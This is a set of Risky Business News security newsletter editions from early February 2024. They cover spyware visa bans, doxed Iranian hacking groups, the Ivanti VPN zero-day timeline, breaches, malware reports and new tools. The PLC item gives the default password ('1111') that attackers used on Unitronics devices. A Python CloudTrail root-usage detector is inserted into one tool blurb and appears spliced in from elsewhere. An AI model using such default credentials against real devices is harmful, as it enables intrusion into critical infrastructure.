
The Risky Business News newsletter has moved

12 February 2024 at 18:23

The Risky Business News newsletter has moved to news.risky.biz.

All our existing Substack members have been moved there. We sent out two editions—on February 9 and February 12—from our new home.

If you have not received them, please make sure the new emails aren't landing in your Spam folder, or visit news.risky.biz and resubscribe.

Our sister newsletter, Seriously Risky Business, will also send its edition from its new home later this week.

Risky Biz News: US imposes visa ban on individuals linked to commercial spyware

7 February 2024 at 00:30

This newsletter is brought to you by Thinkst, the makers of the much-loved Thinkst Canary. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed.

The US government has restricted visas for individuals involved in the development and misuse of commercial spyware.

The Department of State says commercial spyware has facilitated repression and enabled human rights abuses.

"Such targeting has been linked to arbitrary detentions, forced disappearances, and extrajudicial killings in the most egregious of cases. Additionally, the misuse of these tools presents a security and counterintelligence threat to U.S. personnel," Secretary of State Antony Blinken said in a statement.

The visa restriction applies to individuals who developed or sold commercial spyware but also to those who misused it. It also applies to close family members, such as spouses and children.

Officials did not name any commercial spyware vendors. A State Department representative told Axios they plan to decide which commercial spyware vendor falls under the visa ban on a case-by-case basis.

The visa restriction is extremely likely to apply to individuals linked to spyware vendors such as Candiru, NSO Group, Intellexa, and Cytrox. The US placed the four companies on trade blacklists in 2021 and 2023.

In March 2023, the White House also issued an executive order banning US federal agencies from contracting commercial spyware from vendors with a known track record of misuse, fearing the dodgy products could be misused to spy on US investigations, posing a national security risk.

In a report this week, Google said it currently tracks around 40 commercial spyware vendors "with varying levels of sophistication and public exposure, selling exploits and surveillance capabilities to government customers."

"Investors fuel mercenary spyware proliferation," CitizenLab's John Scott-Railton explained in a series of posts on social media. "Now, even investors willing to gamble and take a loss if a company is sanctioned... will be wondering about [the] possibility of not getting a US visa. Big signal. Big deal."

In addition, a visa entry ban list has other benefits. The biggest is that it can be managed and expanded much easier and faster than an international sanctions list that needs to be coordinated with different US government agencies and maybe some foreign countries.

It remains unclear how the visa restriction will work with citizens of countries with a visa waiver.

Breaches, hacks, and security incidents

Deepfake theft incident: An employee at a multinational company in Hong Kong sent $25 million to scammers. The employee transferred the funds after the scammers invited them to a meeting with deepfake versions of their colleagues and chief financial officer. Hong Kong police said the theft is one of many similar incidents where deepfake technology was used. [Additional coverage in CNN]

Google+ breach settlement: Google has agreed to pay $350 million to settle a class action lawsuit over a security lapse at its defunct Google+ social network. The incident took place in 2018 when Google discovered that the Google+ API exposed the data of 52.5 million users. Google initially agreed to pay $7.5 million to affected users in a separate lawsuit. The new $350 million settlement is for individuals who bought Google stock between April 2018 and April 2019 and were impacted by Google's security blunder. [Additional coverage in WaPo]

Philippines govt cyberattacks: Hackers operating out of China tried to break into websites and email systems of the Philippine government. The attackers DDoSed government sites and attempted to break into Google Workspace admin accounts. Philippine officials say the attacks came from Chinese IPs but didn't attribute the attacks to the Chinese government. [Additional coverage in PhilStar]

Japan MFA hack: Chinese state-sponsored hackers have allegedly breached a system used by the Japanese Ministry of Foreign Affairs to exchange diplomatic cables. The hack took place in 2020 and was initially detected by US authorities. The same hacking campaign also breached a network used by the Japanese Defense Ministry to handle classified military information. In light of the hacks, the Japanese government committed to hiring 20,000 cybersecurity professionals in the coming years. [Additional coverage in Yomiuri, Piyolog, and MofA/PDF]

Netherlands MoD hack: The Dutch government says that Chinese cyber spies breached an unclassified military defense network in a security breach last year. According to a technical report published by the Dutch military intelligence agency, the hackers gained access after exploiting an old vulnerability (CVE-2022-42475) in an unpatched FortiGate firewall. The threat actor deployed an advanced backdoor named COATHANGER that was designed to survive both reboots and firmware upgrades.

General tech and privacy

Apple warning: Apple Fellow Phil Schiller—who heads the company's App Store—warns that EU users will be more vulnerable to attacks and intrusive tracking after the EU forced the company to open its platform for third-party app stores. [Additional coverage in Fast Company]

Google Rust grant: Google has announced a $1 million grant for the Rust Foundation to improve the programming language's interoperability with C++.

Copilot lowers code quality: A new GitClear study has found that GitHub's new AI-powered Copilot tool lowers code quality and maintainability. [Additional coverage in Visual Studio Magazine]

Android Virtualization Framework: Here's a list of Android smartphones that support the new Android Virtualization Framework that shipped with Android 14.

Pkl: Apple has open-sourced a new programming language named Pkl (pronounced Pickle), an embeddable configuration-as-code language designed for runtime configuration. Pkl can work with apps written in Go, Swift, Java, and Kotlin.

Mozilla Monitor Plus: Mozilla has launched a paid version of its Monitor service that will allow users to remove subscribers' data from data broker services. The new service is named Mozilla Monitor Plus and will cost users $8.99 per month.

Government, politics, and policy

Russia formally bans VPNs: The Russian government has formally banned the use of VPN services starting on March 1 this year. The ban was announced by Ekaterina Mizulina, Chairwoman of the Safe Internet League, a para-government organization that works with the Kremlin to censor the Russian internet. Mizulina described the ban as a measure needed to stop VPNs from siphoning information from Russian devices. The Russian official was sanctioned by the EU at the end of January for her work on restricting freedom of opinion and expression in Russia. She is often described as Russia's main censor. The official ban comes as Russian officials repeatedly claimed they would not ban VPN services. Russian telecommunications watchdog Roskomnadzor has been silently banning VPN services and protocols since Russia's invasion of Ukraine. [Additional coverage in TASS]

Russian internet censorship visibility: Russian officials are planning to limit access to the list of websites blocked by Russian telecommunications watchdog Roskomnadzor. [Additional coverage in Kommersant]

US industry group pushback: Cybersecurity and tech trade groups are urging the US government to rethink its new cybersecurity requirements for federal contractors. The new requirements include stricter breach reporting and the use of software bills of materials (SBOMs). [Additional coverage in NextGov]

Pall Mall Process: Thirty-six countries have signed a new international agreement at an event in London to tackle the hacker-for-hire and commercial spyware industry. Named the Pall Mall Process, the agreement will encourage governments to tackle the growing number of companies providing such services. Israel, the home of many of these companies, did not attend. Representatives from Apple, Google, Microsoft, and other private-sector companies were also at the event.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Haroon Meer of Thinkst Canary. They discuss how network attackers win, how their tactics have changed over time, and what this means for network defenders.

Cybercrime and threat intel

Grandoreiro money mules: Spain's National Police has detained 133 suspected money mules for allegedly helping the Grandoreiro malware gang launder stolen funds. The suspects were detained over the course of the past two years. Brazilian police detained five individuals last month believed to be the leaders of the Grandoreiro malware gang. The Grandoreiro gang has targeted and stolen funds from customers of banks in Brazil, Spain, Portugal, and Mexico since 2019.

Google's view of the commercial spyware industry: Google says it is tracking around 40 entities that are currently active on the commercial surveillance market. The companies have varying degrees of sophistication and are involved in the sale of exploits and turn-key surveillance capabilities to government customers. Google says that 20 of the 25 zero-days discovered last year were linked to spyware vendors. The company also says that half of the zero-days discovered in Google products since 2014 are also linked to spyware vendors.

ResumeLooters: A cybercrime group named ResumeLooters has breached and stolen sensitive data from at least 63 websites across Southeast Asia. The group's attacks leveraged SQL injection and XSS vulnerabilities to gain access to its victims' backend databases. Security firm Group-IB says the group has stolen more than 2 million records, many of which were later sold on Telegram channels for Chinese-speaking cybercriminals. Over a quarter of the stolen data was taken from job search portals.

RedCurl: FACCT has published a new report on RedCurl, a financially motivated hacking group. According to the new report, RedCurl has now expanded operations to Southeast Asia and Australia. The Russian security firm described the group as "Russian-speaking."

C2 infrastructure report: Cobalt Strike has remained the top choice for adversary command and control (C2) infrastructure last year, according to a recent Sekoia report. It's honestly no surprise. Cobalt Strike has been the top choice for APTs and cybercrime operators for more than half a decade now.

Ransomware in 2023: Palo Alto Networks has published a yearly overview of the 2023 ransomware landscape. Last year, activity hit an all-time high, with 3,998 victims listed on leak sites and 25 new ransomware leak sites launched on the dark web. Malwarebytes also published a report on the same topic.

Malware technical reports

BlackHunt ransomware: Rapid7 has published a technical write-up on BlackHunt, the ransomware gang that recently hit a major Paraguayan ISP. Researchers say BlackHunt uses some of the leaked LockBit source code and has been heavily inspired by REvil operations.

Mispadu Stealer: Palo Alto Networks has published a report on Mispadu Stealer, an infostealer that is commonly used to target LATAM organizations.

Ov3r_Stealer: Trustwave looks at Ov3r_Stealer, a new infostealer spread online using phishing and Facebook ads.

PikaBot: Logpoint has published a report on the PikaBot loader, which has been offered as a MaaS since early 2023.

Sponsor Section

Most companies discover they've been breached way too late. Thinkst Canary fixes this: just 3 minutes of setup, no ongoing overhead, nearly 0 false positives, and you can detect attackers long before they dig in. Check out why our Hardware, VM, and Cloud-based Canaries are deployed and loved on all 7 continents.

APTs, cyber-espionage, and info-ops

Midnight Blizzard Microsoft hack: SpecterOps researchers have published an analysis of how the Midnight Blizzard Russian APT breached Microsoft's infrastructure.

Vulnerabilities, security research, and bug bounty

Android security updates: The monthly security updates for Android smartphones are out.

Canon security updates: Printer maker Canon has published a security update to patch seven issues in its printer firmware. The vulnerabilities were used at last year's Pwn2Own hacking contest.

Ivanti zero-day write-up: Assetnote has published a technical write-up on CVE-2024-21893, the latest of the three recent zero-days in Ivanti Connect Secure VPN appliances. This has now entered mass exploitation after two PoCs were published online.

Ivanti Avalanche write-up: Trend Micro's ZDI has published a write-up on CVE-2023-46263, an arbitrary file upload vulnerability in the Ivanti Avalanche MDM product.

MikroTik unpatchable jailbreak: Agile Information Security's Pedro Ribeiro has published a jailbreak for MikroTik Cloud Hosted Router (CHR).

CISA KEV 2023 analysis: Security firm Horizon3 has analyzed all the entries published in 2023 in CISA KEV, a database of actively exploited vulnerabilities. Almost half of the actively exploited bugs discovered last year targeted insecure exposed functions rather than memory corruption issues, leading researchers to believe that a transition to Rust won't put a dent in actively exploited bugs as was initially believed.

Infosec industry

Employee trust in security teams: A CybSafe survey found that 97% of employees across the UK and US trust their cybersecurity teams despite having trust and visibility fears.

VT Livehunt Cheat Sheet: Google has published a cheat sheet for its VirusTotal Livehunt service.

New tool—Root User Alarm: Software engineer Ben from KC has published a Terraform library named Root User Alarm that will automatically configure AWS root user usage alarms.
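The detection logic behind a root user usage alarm, as an added example that is not the Root User Alarm library's own code: it applies the CloudTrail filter pattern that CloudWatch Logs metric filters use for root activity (userIdentity.type is Root, no invokedBy, event type not AwsServiceEvent) to a few constructed sample events.

```python
import json
from typing import Iterable

# Constructed CloudTrail records (not real events): a root console login,
# a KMS action AWS performed on root's behalf, an IAM user call, and a
# root API call that creates an access key.
SAMPLE_EVENTS = [
    {
        "eventTime": "2024-02-01T10:15:00Z",
        "eventSource": "signin.amazonaws.com",
        "eventName": "ConsoleLogin",
        "eventType": "AwsConsoleSignIn",
        "sourceIPAddress": "198.51.100.23",
        "userIdentity": {"type": "Root", "accountId": "123456789012",
                         "arn": "arn:aws:iam::123456789012:root"},
    },
    {
        "eventTime": "2024-02-01T10:16:00Z",
        "eventSource": "kms.amazonaws.com",
        "eventName": "Decrypt",
        "eventType": "AwsApiCall",
        "sourceIPAddress": "kms.amazonaws.com",
        "userIdentity": {"type": "Root", "accountId": "123456789012",
                         "invokedBy": "kms.amazonaws.com"},
    },
    {
        "eventTime": "2024-02-01T10:17:00Z",
        "eventSource": "s3.amazonaws.com",
        "eventName": "ListBuckets",
        "eventType": "AwsApiCall",
        "sourceIPAddress": "203.0.113.7",
        "userIdentity": {"type": "IAMUser", "userName": "deploy",
                         "accountId": "123456789012"},
    },
    {
        "eventTime": "2024-02-01T10:18:00Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey",
        "eventType": "AwsApiCall",
        "sourceIPAddress": "198.51.100.23",
        "userIdentity": {"type": "Root", "accountId": "123456789012",
                         "arn": "arn:aws:iam::123456789012:root"},
    },
]


def is_root_activity(event: dict) -> bool:
    """Mirror of the CloudWatch Logs metric filter for root usage:
    { $.userIdentity.type = "Root" && $.userIdentity.invokedBy NOT EXISTS
      && $.eventType != "AwsServiceEvent" }"""
    ident = event.get("userIdentity", {})
    if ident.get("type") != "Root":
        return False
    # Actions an AWS service performs on root's behalf carry invokedBy;
    # they are not a person using the root credentials.
    if "invokedBy" in ident:
        return False
    if event.get("eventType") == "AwsServiceEvent":
        return False
    return True


def root_usage_alerts(events: Iterable[dict]) -> list[dict]:
    """Return one alert record per event that trips the root usage filter."""
    alerts = []
    for ev in events:
        if is_root_activity(ev):
            alerts.append({
                "time": ev.get("eventTime"),
                "account": ev.get("userIdentity", {}).get("accountId"),
                "action": f"{ev.get('eventSource')}:{ev.get('eventName')}",
                "source_ip": ev.get("sourceIPAddress"),
            })
    return alerts


def scan_cloudtrail_file(path: str) -> list[dict]:
    """Run the same filter over a CloudTrail log file ({"Records": [...]})."""
    with open(path) as fh:
        return root_usage_alerts(json.load(fh).get("Records", []))


if __name__ == "__main__":
    for alert in root_usage_alerts(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Of the four sample events, only the console login and the CreateAccessKey call should alert; the KMS action invoked by a service and the IAM user call are filtered out.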

DEF CON conference canceled and uncanceled: The DEF CON cybersecurity conference was forced to relocate to a new venue after Caesars Hotels abruptly terminated its contract. This year's event was canceled for a day before organizers found an empty venue during the busy Las Vegas August period. DEF CON 32 will now be hosted at the Las Vegas Convention Center from August 8 to 11. The DEF CON conference was canceled for the first time in its history and went to virtual format in 2020 due to the COVID-19 pandemic.

BSides London videos: Talks from the BSides London 2023 security conference, which took place in December, are now available on YouTube.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about what up-and-coming countries should expect from a Cyber Command and whether they should invest in it.

Risky Biz News: Two Iranian cyber groups get doxed in a week

5 February 2024 at 00:30


The identities of two Iranian cyber groups have been exposed over the course of seven days last week.

The US government linked the Cyber Av3ngers group to six individuals working for the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC), while a report from Iran International linked the Black Shadow group to an Iranian IT company named "Raahkarha-ye Fanavari-e Etela'at-e Jahatpardaz" (or Jahatpardaz Information Technology Solutions).

The "doxing" events come as Iranian cyber activity entered a new and more aggressive stage after Iran-backed Hezbollah attacked Israeli territories on October 7 last year.

Iranian cyber groups launched operations to DDoS and deface Israeli websites, mass-wipe systems, and leak sensitive data from Israeli organizations, with attacks growing in sophistication with each passing week.

While Cyber Toufan's data-wiping campaign had arguably the most destructive impact, it went under the radar because it hit Israeli organizations almost exclusively.

On the other hand, Cyber Av3ngers had the biggest impact on an international level after the group gained access to PLC equipment used in critical infrastructure and defaced their screens with anti-Israel and pro-Gaza messages.

The group only targeted PLCs from Israeli company Unitronics, which they breached using the device's default password of "1111".

A defaced Unitronics device

The Cyber Av3ngers attacks took place at the end of November, and one of their victims was the water authority in Aliquippa, Pennsylvania. The hack spurred a security assessment spree around the globe, with national CERTs urging critical infrastructure operators to make sure critical infrastructure equipment is secured with strong passwords or placed behind VPN gateways and firewalls.

But while Cyber Av3ngers has effectively been an Iranian intelligence op posing as grassroots hacktivism, Black Shadow has been the opposite.

The group is one of the many IT companies that provide cyber capabilities to the Iranian government. Its activities go back years, with Western cybersecurity companies tracking the group under names such as Agrius, DEADWOOD, SharpBoys, and Americium/Pink Sandstorm. It is a legitimate APT, and back in May 2023, Microsoft linked it to Iran's Ministry of Intelligence and Security, or the MOIS, the country's main intelligence service [see PDF, page 6, or graph below].

Graph showing Microsoft's attribution of Black Shadow to the Iranian MOIS

Iran International claims it identified nine of the group's members, who operate from two offices in Tehran. [archive 1, archive 2]

The report has had minimal traction online, so we couldn't gauge its validity from other industry experts. Those who we contacted declined to comment, citing the need for more time to investigate it further. While it is a report from a non-government and non-threat intel source, the report is very likely to be accurate. Iranian cyber operations have been doxed more times than any other major cyber power, primarily due to the regime's oppressive hand that has indirectly led to the rise of silent dissenters and leakers among its ranks.

Breaches, hacks, and security incidents

Cloudflare security breach: Cloudflare says that a state-sponsored threat actor gained access to its Atlassian servers during the Thanksgiving holiday last year. The attackers used legitimate server credentials that Cloudflare failed to revoke after the Okta security breach from a month earlier, in October. Cloudflare says the compromised server had no customer data, and the breach was immediately detected and contained. The company did not make a formal attribution but says the threat actor sought to obtain persistent and widespread access to its network.

Football Australia leak: Australia's soccer federation exposed AWS access keys in its website's source code, allowing threat actors easy access to more than 127 of its storage buckets. The organization is currently investigating the impact of the breach. [Additional coverage in the Sydney Morning Herald]

Abracadabra Money crypto-heist: A threat actor stole $6.5 million worth of crypto-assets from DeFi protocol Abracadabra Money. The platform says the threat actor exploited a vulnerability in its platform to borrow the funds illegally. The company has sent the attacker a blockchain note asking for its funds back in exchange for a white-hat reward—in yet another shady attempt to hide a malicious hack as vulnerability research. [Additional coverage in DailyCoin]

Clorox ransomware attack: Cleaning products maker Clorox has reported losses of $49 million in connection to a cyberattack the company suffered in August of last year. The figure covers incident response costs, third-party consulting services, and operating costs from the resulting business disruption. In SEC filings last year, Clorox said it expected sales to drop by $356 million as a result of the same incident. The company's CISO also departed weeks after the incident. [Additional coverage in SecurityWeek]

AnyDesk breach: Remote access software company AnyDesk suffered a security breach [archived] on January 29. Hackers accessed internal systems and stole AnyDesk's source code and code signing certificates. The company says that it does not store tokens or keys for accessing remote AnyDesk installs. It did initiate a password reset for customer accounts on its website and support portals. AnyDesk claims it serves more than 170,000 customers, including some of the world's largest companies. The company says the incident is not ransomware. [Additional coverage in BleepingComputer]

Two Mastodon posts from Alex Stamos

General tech and privacy

FTC Blackbaud order: Cloud service provider Blackbaud will be required to delete user data that it does not need for its operations. The requirement is part of a settlement with the US Federal Trade Commission, which sued the company in the aftermath of Blackbaud's 2020 security breach. The company previously also paid a $3 million fine to the SEC for making misleading disclosures about the same incident.

Post-quantum crypto in Firefox: Mozilla has added support for post-quantum cryptography protections in Firefox Nightly. This can be enabled by going to about:config and enabling security.tls.enable_kyber.

RCS protocol: The EFF has published a blog post looking over the new RCS protocol and its downsides and security weaknesses.

Google Search Cache button: Google plans to remove the "cache" feature from its search engine. The feature allows users to view an archived version of a web page as it was recorded by Google during its most recent visit. The company has already removed the "Cache" button from search results and plans to remove the ability to prepend URLs with the "cache:" prefix to view their cached versions. The feature has been used in the past during malware investigations and to bypass paywalls and geo-filters. [Additional coverage in Search Engine Roundtable]

New Teams feature: Microsoft has added a new feature to its Teams application that can allow administrators to disable copying text or forwarding messages from an active chat. The feature is meant to prevent data leakages from sensitive meetings.

Games in Russia: Sony is blocking users from Russia and Belarus from activating its games on the Steam platform. Sony previously stopped PlayStation sales in Russia in March 2022, shortly after its invasion of Ukraine.

Hulu cracks down on password sharing: Following Netflix's move, Hulu has also banned password sharing. Only users in the same household will be allowed to share an account. Users in different locations will need their own accounts. [Additional coverage in The Hollywood Reporter]

Government, politics, and policy

UN Cybercrime Treaty: Royal Hansen, Google's Vice President of Privacy, Safety and Security Engineering, warns that the current version of the UN Cybercrime Treaty criminalizes vulnerability and cybersecurity research.

Tesla car ban: The Chinese government has banned Tesla cars from entering government-affiliated buildings and adjacent premises. According to messages posted on social media by Chinese Tesla drivers, the ban appears to have entered into effect at the end of 2023. Chinese officials cited Tesla's sentry mode feature and its extensive data collection practices. Beijing banned Tesla cars from entering military bases shortly after the carmaker entered the Chinese market. [Additional coverage in Nikkei]

Russia's internet censorship: A third of Russian websites are at risk of getting blocked inside the country after their foreign web hosting providers failed to register with officials. The providers are in violation of a new Russian law that requires all cloud and web hosting providers to register with Roskomnadzor, Russia's telecommunications watchdog. The new law entered into effect on December 1 of last year, and providers that did not register risk having their servers blocked inside Russia. Only 266 web hosting providers have registered with Roskomnadzor, and all are local companies. [Additional coverage in Ria Novosti]

New NSA & CYBERCOM head: US Air Force General Timothy Haugh has officially taken over the position of Director of the National Security Agency and Commander of US Cyber Command. Gen. Haugh replaces US Army General Paul Nakasone, who led both agencies since May 2018. Haugh previously served as the deputy commander of US Cyber Command and was the inaugural head of the 16th Air Force, the branch's first cyber unit.

FCC to make cloned voice calls illegal: The Federal Communications Commission plans to vote to make AI-generated voice calls illegal. The agency says robocalls using cloned voices have escalated over the past years. Scammers have used AI technology to clone the voices of family members, celebrities, and politicians to defraud users.

Robocall success: The US government says it recorded a reduction in the number of illegal robocalls across US mobile networks. The decline comes three months after the FCC and FTC sent letters to seven of the US' top telephony network providers. Companies like CenturyLink, Bandwidth, and TeleCall allegedly worked to detect and block common sources of robocall spam.

FETTA: CERT teams from Poland and Luxembourg have launched the Federated European Team for Threat Analysis, or FETTA, a project aiming to create a federated team to provide CTI products and tooling to EU partners.


Cybercrime and threat intel

Vault7 leaker sentenced: A US judge has sentenced a former CIA employee to 40 years in prison for leaking classified information to WikiLeaks. The leaked documents are known as Vault7, and they revealed extremely sensitive information about the CIA's hacking capabilities. Joshua Schulte was arrested and has been in jail since 2018. Schulte's sentence covers espionage, hacking, contempt of court, making false statements to the FBI, and child pornography.

SIM swapper sentenced: A judge has sentenced an Oregon man to three years in prison for stealing millions of dollars in cryptocurrency through SIM swapping. According to court documents, Daniel James Junk stole more than $3 million from dozens of victims between December 2019 and March 2022. Officials say Junk was a member of an online community specialized in SIM swapping attacks.

FTX SIM swappers charged: The US has charged three suspects for allegedly stealing more than $400 million from cryptocurrency exchange FTX. US prosecutors allege the three suspects used SIM-swapping attacks to take control of an FTX employee's phone number and move crypto-assets from its official accounts. The hack took place in November 2022 as the company was collapsing into bankruptcy and was initially thought to be an inside job. [Additional coverage in Elliptic and ArsTechnica]

"A recent indictment alleged that Robert Powell—using online monikers "R," "R$," and "ElSwapo1"—was the "head of a SIM swapping group" called the "Powell SIM Swapping Crew." He allegedly conspired with Indiana man Carter Rohn (aka "Carti" and "Punslayer") and Colorado woman Emily Hernandez (allegedly aka "Em") to gain access to victims' devices and "carry out fraudulent SIM swap attacks" between March 2021 and April 2023."

BEC scam recovery: The US Secret Service has recovered more than $3 million stolen by BEC scammers from the North Carolina Housing Finance Agency in April 2023. [Additional coverage in The Record]

Spyware maker shuts down: Two phone surveillance solutions named PhoneSpector and Highster appear to have shut down operations shortly after getting fined $410,000 by New York's OAG. [Additional coverage in TechCrunch]

Spyhide profile: NZZ reporters have published a profile on Spyhide, a now-defunct Iranian spyware vendor. The service had shut down after getting hacked by a Swiss hacker.

Wikipedia scams: The Wikipedia editorial team has published an article on how "reputation companies" are scamming users and companies across the world with so-called Wikipedia page creation or page editing services.

New npm malware: Thirty-three malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

TeamTNT doppelgänger: Datadog's security team has tracked a cryptomining campaign that has targeted servers with exposed Docker APIs. This blog post seems to cover a threat actor that Cado named Commando Cat.

DangerDev: Invictus IR has published a report on DangerDev, a threat actor seen hijacking AWS infrastructure for cryptomining. The threat actor seems related to what Datadog covered here.

AlphV operations: Security firm AreteIR is reporting that the AlphV ransomware group has returned with new attacks despite a US takedown in mid-December of last year.

Shadow rebrand: The Shadow ransomware gang has rebranded under the name of DARKSTAR. The gang has a history of primarily attacking Russian organizations. It was previously also known as Comet.

REF0657: Elastic's security team looks at REF0657, a threat actor that hit a financial services organization in South Asia in December 2023.

DeFi scams: Sophos' Sean Gallagher looks at the recent "DeFi mining" and "DeFi Savings" crypto scams that have flooded social media over the past months.

NetOps exposure: Threat intel company Resecurity has identified more than 1,500 compromised network operator accounts that are currently being sold on the dark web. The accounts provide access to RIPE, APNIC, LACNIC, and AFRINIC management portals, where threat actors can hijack BGP routes and redirect internet traffic. Resecurity says the account credentials were stolen after operators had their systems infected with infostealers.

RIPE accounts for sale on cybercrime forums

Malware technical reports

Smargaft technique: A new IoT botnet named Smargaft is abusing Binance smart contracts to host and hide information about the location of its command and control servers. Chinese security firm QiAnXin first spotted the botnet in October of last year and said Smargaft is being used to launch DDoS attacks and run a malicious proxy network. The botnet is the second threat actor to hide information about its infrastructure in Binance smart contracts after the ClearFake gang. The technique is known as EtherHiding.

Graph showing the modus operandi of the Smargaft botnet

Backdoor Activator: SentinelOne's Phil Stokes looks at Backdoor Activator, a novel macOS malware currently distributed via pirated macOS apps. With macOS gaining ground in the enterprise market, we are now seeing more and more malware gangs focusing on macOS systems.

Zephyr: AhnLab researchers look at Zephyr, a cryptominer distributed via phishing campaigns.

AZORult: CyberInt researchers have published a technical dive into the AZORult infostealer.

Qakbot: Zscaler analysts look at how the Qakbot malware has evolved over the past 15 years since its creation.

Graph showing Qakbot's phases and evolution


APTs, cyber-espionage, and info-ops

Stately Taurus: CSIRT-CTI has published details on more Stately Taurus campaigns targeting the Myanmar military regime, attacks the company documented in a previous blog post.

Kimsuky: Chinese security firms Sangfor and QiAnXin have published reports on Kimsuky's recent operations targeting South Korean organizations with the Xeno RAT.

APT-K-47 (Mysterious Elephant): Chinese security firm KNOW Chuangyu has published a report on new tools used by APT-K-47 (Mysterious Elephant), an APT they believe might be tied to the Bitter group. [Now in English here]

STEADY#URSA: Securonix has published details on STEADY#URSA (aka Shuckworm), a Russian threat actor targeting Ukrainian military personnel with a new PowerShell-based backdoor named SUBTLE-PAWS. The backdoor can spread via infected USB devices.

2023 APT report: Chinese security firm QiAnXin has published its year-in-review report for APT activity observed in 2023.

Vulnerabilities, security research, and bug bounty

Confluence honeypot spam: VulnCheck researchers say the internet has been flooded with Atlassian Confluence honeypots, which makes discovering real servers a much harder task. The company has found that only around 4,000 of the 240,000 Confluence systems it identified are legitimate servers. The number of Confluence honeypots has exploded after several highly critical vulnerabilities were disclosed and exploited in the wild over the past few months. Currently, CISA's KEV database lists nine Confluence vulnerabilities exploited in the wild.

ModSecurity vulnerability: SicuraNext's Andrea Menin has published an analysis of CVE-2024-1019, a vulnerability in the ModSecurity open-source WAF that allows threat actors to bypass the firewall.

QNAP security updates: Taiwanese NAS vendor QNAP has released 23 security updates for its products.

Juniper security updates: Juniper has released a security update to patch 20 vulnerabilities in its JSA (Juniper Secure Analytics) series.

Zyxel security updates: Zyxel has released a security update to fix a post-auth command injection vulnerability in its NAS products.

Flysmart+ Manager vulnerabilities: Pen Test Partners have found vulnerabilities in Flysmart+ Manager, a mobile app developed by Airbus and used by pilots to manage their flight schedules.

Vinchin vulnerabilities: LeakIX has published a write-up on five vulnerabilities in the Vinchin Backup & Recovery solution. The bugs—from CVE-2024-22899 to CVE-2024-22903—can be chained for RCE attacks.

Infosec industry

PAN loses patent lawsuit: A judge awarded cybersecurity company Centripetal Networks $151.5 million in damages in a patent infringement lawsuit filed against Palo Alto Networks. A jury trial found that Palo Alto Networks infringed on four of Centripetal's "threat intelligence gateway" patents. Centripetal was previously awarded $2.75 billion in a 2020 lawsuit against Cisco, the largest patent infringement penalty in US history. Cisco had the record-breaking award invalidated on appeal last year. [Additional coverage in MarketScreener]

New tool—DCV Inspector: Security researcher Andrew Ayer has open-sourced DCV Inspector, a tool to inspect the DNS, HTTP, and SMTP requests made by a certificate authority during domain validation.

New tool—OSS-Fuzz-Gen: Google has open-sourced OSS-Fuzz-Gen, a new LLM-driven fuzzing framework based on its OSS-Fuzz toolkit.

New tool—Deluder: Software engineer Michal Válka has released Deluder, a tool for intercepting traffic of proxy-unaware applications. It currently supports OpenSSL, GnuTLS, SChannel, WinSock, and Linux Sockets.

New tool—ThievingFox: Security researcher Slowerzs has open-sourced a red-team tool named ThievingFox, a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities.

New tool—DIFFER: Security firm Trail of Bits has open-sourced a tool named DIFFER that can find bugs and soundness violations in transformed programs.

"We used DIFFER to evaluate 10 software debloating tools, and it discovered debloating failures or soundness violations in 71% of the transformed programs produced by these tools."

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how the war in Ukraine is showing how useful mobile devices are in a war. Using them is risky, but those risks need to be managed.

Risky Biz News: Let's revisit the Ivanti Connect Secure clusterfudge

2 February 2024 at 00:30

This newsletter is brought to you by enterprise browser maker Island. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

All journalists take pride in being able to put together smart and intelligible sentences that convey a story. However, three weeks after Ivanti disclosed the existence of two zero-days in its Connect Secure VPN appliance, things have become so twisted and convoluted that, at this point, I feel like it's time to bring out the bulleted list format in order to put some order in the ginormous clusterf**k that these zero-days have become.

So, for the sake of clarity—both mine and yours—let's review where things stand with the recent batch of Ivanti zero-days and their exploitation.

  • On January 10, Ivanti published a security advisory on two vulnerabilities in its Connect Secure (formerly Pulse Secure) VPN appliance that were exploited in the wild. These two zero-days were assigned CVE-2023-46805 (authentication bypass) & CVE-2024-21887 (command injection).

  • The security advisory did not include firmware patches but only temporary mitigations in the form of an encrypted XML file that customers were supposed to run on their devices.

  • On the same day, security firm Volexity published a blog post and linked the attacks exploiting the two zero-days to a Chinese cyber-espionage group they were tracking as UTA0178.

  • Two days later, on January 12, Mandiant confirmed the attacks and linked them to a group they were calling UNC5221.

  • The threat actors were installing webshells and backdoors on the compromised devices. Attackers also installed JavaScript on the login pages to capture employee logins.

  • Malware installed on infected devices includes stuff named GLASSTOKEN, GIFTEDVISITOR, BUSHWALK, WIREFIRE, LIGHTWIRE, FRAMESTING, THINSPOOL, ZIPLINE, WARPWIRE, and KrustyLoader. (These are detailed in technical reports from Volexity, Mandiant, QuoIntelligence, and Synacktiv.)

  • Some of these webshells and backdoors were exposed on the internet and could be fingerprinted, allowing security firms to determine the location of infected devices across the world. The number of infected devices visible on any given day is usually a few hundred, but at one point, it peaked at around 1,700.

  • A week later, on January 18, attacks against Connect Secure devices entered the mass-exploitation phase after proof-of-concept code was published online. Cryptomining botnets were the first to get in on the act, per GreyNoise and Volexity. Initial access brokers and ransomware gangs most likely followed—although this is unconfirmed for now.

  • Exploitation could be detected by looking at the device's network traffic, the device's logs, or by running Ivanti's Integrity Checker Tool.

  • The attackers also backdoored the device's configuration file. This meant that companies that applied the mitigation and then re-applied a backup of an older configuration file were reinfecting themselves.

  • After the attacks were exposed and Ivanti released mitigations, security firms saw the Chinese APT bypassing both mitigations and Ivanti's Integrity Checker Tool.

  • The APT's efforts to remain on the infected devices were most likely what caused Ivanti to delay its firmware patches, initially scheduled for January 22.

  • On the day of the scheduled patch, Ivanti released an "external" Integrity Checker Tool that companies could use on their devices instead of the default (internal) one that was shipped with its devices and most likely compromised/altered.

  • These firmware updates came out on January 31—but with a surprise. They also patched two other vulnerabilities tracked as CVE-2024-21888 (privilege escalation) and CVE-2024-21893 (server-side request forgery).

